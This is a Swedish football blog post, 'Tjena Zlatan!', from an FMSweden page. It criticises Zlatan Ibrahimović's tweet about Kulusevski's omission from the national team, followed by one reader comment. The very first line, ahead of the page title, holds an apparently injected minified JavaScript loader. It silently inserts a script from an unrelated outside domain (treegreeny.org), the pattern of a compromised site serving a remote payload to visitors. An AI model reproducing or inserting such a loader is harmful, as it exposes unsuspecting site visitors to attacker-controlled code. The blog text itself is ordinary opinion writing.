;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Tjena Zlatan! – FMSweden
Meny Stäng

Fabbes blogg: Tjena Zlatan!

Efter en vecka där vår gode vän på Z tagit all uppmärksamhet under en landslagssamling han inte varit på så kommer här ett blogginlägg om ämnet. Om ni inte redan läst allt? Antagligen. Men här är i alla fall min åsikt.

Vad är sannolikheten i procent att Zlatan läser den här bloggen, säger jag. 0,0000001%, säger ni. Taget.

Tjena Mr. Ibrahimovic!

Det är dags att växa upp nu. Du är 39 år, en fantastisk fotbollsspelare, men ibland undrar jag hur du tänker. Jag förstår vad du är ute efter, men du missar mål igen. Det är oerhört märkligt, och faktiskt imponerande dumt, att vända en Kulusevski-petning till att handla om något annat än just fotboll. Sist du var ute och svingade med samma åsikter visade det sig att du inte hade belägg för det alls, och den här gången finns det faktiskt inget som tyder på att du ens träffar kortsidan med ditt försök till långskott.

Missförstå mig rätt, det finns rasism inom svensk fotboll, det är inte det jag säger. På alla nivåer, inom alla åldrar, från ungdomsfotboll till seniorfotboll finns den där. Och det är inget annat än för jävligt. Ingen ska behöva utstå någon som helst rasism någonstans i samhället. Men just en petning av Kulusevski i dennes andra landslagssamling, när vi möter världsmästarna hemma, är inte rätt läge att dra rasist-kortet. För det var väl det du gjorde igen? Det var inte helt lätt att tolka din Tweet på något annat sätt med tanke på utspelet för ett knappt år sedan.

Jag säger som på dagens presskonferens: Det vore kul om Zlatan stöttade landslaget istället. Eller vad tycker du själv?

/Din körsbärslikör i Aladdinasken, Fabian

———————————

För övrigt tycker jag också att Kulusevski är en bättre fotbollsspelare än Sebastian Larsson. Men samtidigt var det väl årets mest väntade beslut att Larsson skulle spela?

———————————

Bortsett från landslagsfotbollen ska min sambo denna helgen sitta i en buss mellan Alingsås och Skellefteå för att spela 90 minuter fotboll. Åka 8.00 på lördagsmorgonen, och hemma vid 7.00 på måndagsmorgonen. Totalt 30 timmar i en buss – man får fan älska fotboll för att spela i Elitettan!

Det var allt för denna veckan, vi hörs!

Please wait...

Liknande Inlägg

3 kommentarer

  1. Micke

    Väldigt väntad elva. När Sverige gör sin första landskamp på över ett halvår och dessutom möter de regerande världsmästarna var det inget konstigt att Seb startade. Balansen på mittfältet hade blivit ganska vågad med Forsberg på andra kanten. Sedan måste man förstås se det långsiktigt, Kulusevski har ju precis kommit in i landslaget och fick nu starta mot Portugal också. Hans tid kommer.

Lämna ett svar